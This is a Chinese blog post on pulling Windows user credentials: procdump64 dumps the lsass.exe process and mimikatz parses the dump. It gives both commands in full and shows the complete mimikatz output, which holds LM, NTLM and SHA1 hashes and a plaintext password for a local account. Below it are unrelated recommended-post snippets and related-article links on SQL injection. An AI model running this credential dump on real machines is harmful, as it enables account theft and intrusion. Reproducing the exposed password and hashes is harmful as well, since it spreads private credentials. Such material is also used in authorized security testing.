procdump64+mimikatz获取win用户hash密码
1.导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.执行mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
效果:
.#####. mimikatz 2.1. (x64) built on Jun :: - lil!
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp' mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump... Authentication Id : ; (:00021a83)
Session : Interactive from
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : // ::
SID : S-------
msv :
[] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman : Authentication Id : ; (:00021a5d)
Session : Interactive from
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : // ::
SID : S-------
msv :
[] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman : Authentication Id : ; (:000003e5)
Session : Service from
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman : Authentication Id : ; (:000003e4)
Session : Service from
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman : Authentication Id : ; (:0000bdf6)
Session : UndefinedLogonType from
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : // ::
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman : Authentication Id : ; (:000003e7)
Session : UndefinedLogonType from
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman : mimikatz(commandline) # exit
Bye!
procdump64+mimikatz获取win用户hash密码的更多相关文章
- 两步完成利用procdump64+mimikatz获取win用户密码
使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...
- 渗透测试环境搭建以及使用sqlmap获取mysql用户数据库密码
通过sqlmap检测sql注入漏洞 安装SQLmap漏洞查看工具 安装渗透测试演练系统DVWA 使用SQLmap进行sql注入并获得后台管理员adnim帐号和密码 环境介绍 安装SQLmap:Rich ...
- Android开发——后台获取用户点击位置坐标(可获取用户支付宝密码)
1. getevent命令 我们首先是根据adb shell getevent命令获取到被点击位置的信息. 这里要说明的是,不同的手机手机获得的点击输出是不一样的.以我的真机为例,输出如下 本文原创, ...
- 6.Dump域内用户Hash姿势集合
本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-do ...
- 内网渗透----使用mimikatz获取windows登陆口令
使用mimikatz提取windows密码 以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privi ...
- 内网技巧-通过SAM数据库获得本地用户hash的方法
内网技巧-通过SAM数据库获得本地用户hash的方法 在windows上的C:\Windows\System32\config目录保存着当前用户的密码hash.我们可以使用相关手段获取该hash. 提 ...
- MySQL新建用户,授权,删除用户,修改密码等命令
首先要声明一下:一般情况下,修改MySQL密码,授权,是需要有mysql里的root权限的. 注:本操作是在WIN命令提示符下,phpMyAdmin同样适用. 用户:phplamp 用户数 ...
- 根据当前登录域账号 获取AD用户姓名和所在OU目录
#region 根据当前登录域账号 获取AD用户姓名和所在OU目录 /// <summary> /// 根据当前登录域账号 获取AD用户姓名和所在OU目录 返回域用户是否存在 /// &l ...
- 为Druid监控配置访问权限(配置访问监控信息的用户与密码)
转: l 为Druid监控配置访问权限(配置访问监控信息的用户与密码) 2014-09-26 09:21:48 来源:renfufei的专栏 收藏 我要投稿 Druid是一 ...
随机推荐
- 【第九篇】uploadify上传文件
依然不多说,上代码 首先是给文件夹的位置 然后上代码 <div class="upload"> <div class="uploadswf"& ...
- 手把手教程: CentOS 6.5 LVS + KeepAlived 搭建 负载均衡 高可用 集群
为了实现服务的高可用和可扩展,在网上找了几天的资料,现在终于配置完毕,现将心得公布处理,希望对和我一样刚入门的菜鸟能有一些帮助. 一.理论知识(原理) 我们不仅要知其然,而且要知其所以然,所以先给大家 ...
- mysql数据库事务隔离原理
今天在学习JDBC的时候看到了关于MySQL的事务的隔离级别的问题,感觉内容挺高级的,所以记录一篇文章,以备后面使用. 数据库隔离级别有四种,应用<高性能mysql>一书中的说明: 然后说 ...
- Apache Commons Collections 反序列化详细分析学习总结
0x01.环境准备: Apache Commons Collections 3.1版本,下载链接参考: https://www.secfree.com/a/231.html jd jui地址(将jar ...
- Java定时发送邮件
背景 甲方爸爸:新接入业务在国庆以及军运会期间需要每天巡检业务并发送邮件告知具体情况! 我司:没问题. 甲方爸爸:假期也要发噢. 我司:没问题(...). 刚开始计划指定几个同事轮流发送,业务只要不被 ...
- 【面试题】Java常见面试题
集合与数组? 数组:(可以存储基本数据类型)是用来存储对象的一种容器,但是数组的长度固定,不适合在对象数量未知的情况下使用 集合:(只能存储对象,对象类型可以不一样)集合的长度可变,可在多数情况下使用 ...
- C# 时间戳的相关操作
一般的 时间戳 格式分为两种 即 10位(秒)时间戳 与 13位(毫秒)时间戳 时间戳 类型也分为两种 即 本地时间戳 与 世界统一(UTC)时间戳 废话不多说,直接上代码: 一.时间戳获取方法 // ...
- TCP通信 -C/S中的Socket与ServerSocket
客户端类:Socket类 TCP通信的客户端:向服务器发送连接请求,给服务器发送数据,读取服务器的数据,两次IO流 java.lang.Object 继承者 java.net.Socket 构造方法: ...
- Spring boot 梳理 - 全局配置文件application.properties或者是application.yml,在resources目录下或者类路径下的/config下,一般我们放到resources下。
全局配置文件application.properties或者是application.yml,在resources目录下或者类路径下的/config下,一般我们放到resources下.
- Spring Cloud 初认识
Spring Cloud是一个继承了众多开源的框架,其利用了Springboot开发的便利性来实现分布式服务功能,是一套开放.易部署.易维护的分布式开发工具包,而且有成熟的社区且社区活跃度很高.Spr ...